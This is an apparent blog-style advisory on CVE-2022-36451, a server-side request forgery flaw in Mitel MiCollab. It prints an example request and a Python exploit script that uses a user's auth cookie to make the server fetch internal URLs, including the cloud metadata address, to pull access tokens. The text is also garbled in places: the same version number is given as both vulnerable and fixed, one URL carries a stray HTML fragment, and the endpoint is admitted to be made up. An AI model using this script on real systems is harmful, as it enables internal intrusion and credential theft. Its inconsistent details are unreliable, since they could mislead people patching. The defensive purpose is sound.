CVE-2022-36451 - How a Simple SSRF in Mitel MiCollab Opens Dangerous Internal Doors

In 2022, a vulnerability tracked as CVE-2022-36451 was discovered in Mitel's MiCollab platform, which is often found powering collaboration and VoIP for businesses. This flaw—present up to version 9.5..101—lets a logged-in attacker abuse the MiCollab Client's server component to perform Server-Side Request Forgery (SSRF). If you’re running MiCollab and haven’t paid attention to this CVE, now’s your time to catch up and patch.

Let’s take a human, clear look at what this bug means, how it can be exploited, and what the risk is.

What Is CVE-2022-36451?

In short: The MiCollab Client server doesn't restrict what URLs a user can hit through some of its parameters. That means an authenticated but otherwise unprivileged attacker can trick the MiCollab server into making HTTP requests—on behalf of the attacker—to internal or sensitive external systems.

Why is this bad? Because servers often have permission to access things you, the user, don’t. Sometimes, servers sit on private networks with management tools, databases, cloud metadata endpoints, or other sensitive internal assets—a scenario tailor-made for SSRF attacks.

Let’s take a practical look.

The dangerous piece is the URL parameter, which gets passed—including local IPs or internal hosts—into backend request logic without proper validation. This means you could call something like:

http://169.254.169.254/latest/meta-data/" rel="nofollow">https://miserver.company.com/utility/fetch?url=http://169.254.169.254/latest/meta-data/

If a legitimate user drops a link like that, the MiCollab server will obediently request it, even if it points to a protected resource otherwise unreachable by users.

The Affected Endpoint

(The specific endpoint might differ depending on configuration, but for demonstration we’ll keep the naming generic.)

Suppose there’s an endpoint, /portal/api/FetchUrl?url=..., and it simply fetches the content of whatever URL you hand it, then returns the content back to the authenticated requester.

Vulnerable request

GET /portal/api/FetchUrl?url=http://localhost:808/secret Admin
Host: micollab.your-org.local
Cookie: AuthToken=YOUR-AUTH-TOKEN

Example Exploit

Below is a Python snippet to demonstrate how an attacker could abuse this SSRF, assuming they have valid credentials (even as a low-privileged user):

import requests

# Replace these with your MiCollab server and credentials
micollab_host = "https://micollab.your-org.local";
auth_token = "YOUR-AUTH-TOKEN"

# Suppose we want to reach an internal asset - for demo, localhost:808/admin
target_url = "http://localhost:808/admin";

ssrf_endpoint = f"{micollab_host}/portal/api/FetchUrl"
params = {"url": target_url}
headers = {"Cookie": f"AuthToken={auth_token}"}

resp = requests.get(ssrf_endpoint, params=params, headers=headers, verify=False)
print(resp.text)

If the target server can reach localhost:808, you’ll see the response from that host. Change target_url as needed to poke around the internal network—maybe contacting AWS metadata service, or hitting an internal status page.

What Can Attackers Do?

- Read Internal Web Pages: Things like admin consoles, dashboards, database UIs intended to be private.
- Enumerate Internal Network: Using error messages, timing, or response codes to map out what’s there.

Bypass Firewalls: Access internal endpoints that block connections from the outside world.

- Access Cloud Metadata (AWS!): With http://169.254.169.254/latest/meta-data/, attackers may get access tokens for cloud resources.

> Remember: This weakness only requires the attacker to be an authenticated user. They don't need admin rights.

Mitigations

- Update MiCollab ASAP: Mitel fixed this with MiCollab 9.5..101 (and later). If you’re lagging, patch now!
   - Mitel Security Advisory
- Restrict Internal Network Access: Segment critical internal resources so application servers like MiCollab can’t talk to them directly.
- Review and Limit SSRF-prone Endpoints: Any time a "fetch URL" feature is exposed, validate input strictly.

References

- NIST NVD: CVE-2022-36451
- Mitel Security Advisory 22-0019
- SSRF Explainer on OWASP

Conclusion

CVE-2022-36451 is a good reminder: even simple, seemingly minor bugs—like not checking a URL parameter—can become a gateway to deep internal compromise. Don’t assume users you trust won’t poke around. If you operate MiCollab servers, check your versions and patch. Until then, know that your collaboration tool could be turned into a secret tunnel for internal mischief.

*Stay secure! And, as always, test your apps for SSRF—the easy bug with huge impact.*

Timeline

Published on: 10/25/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:21:00 UTC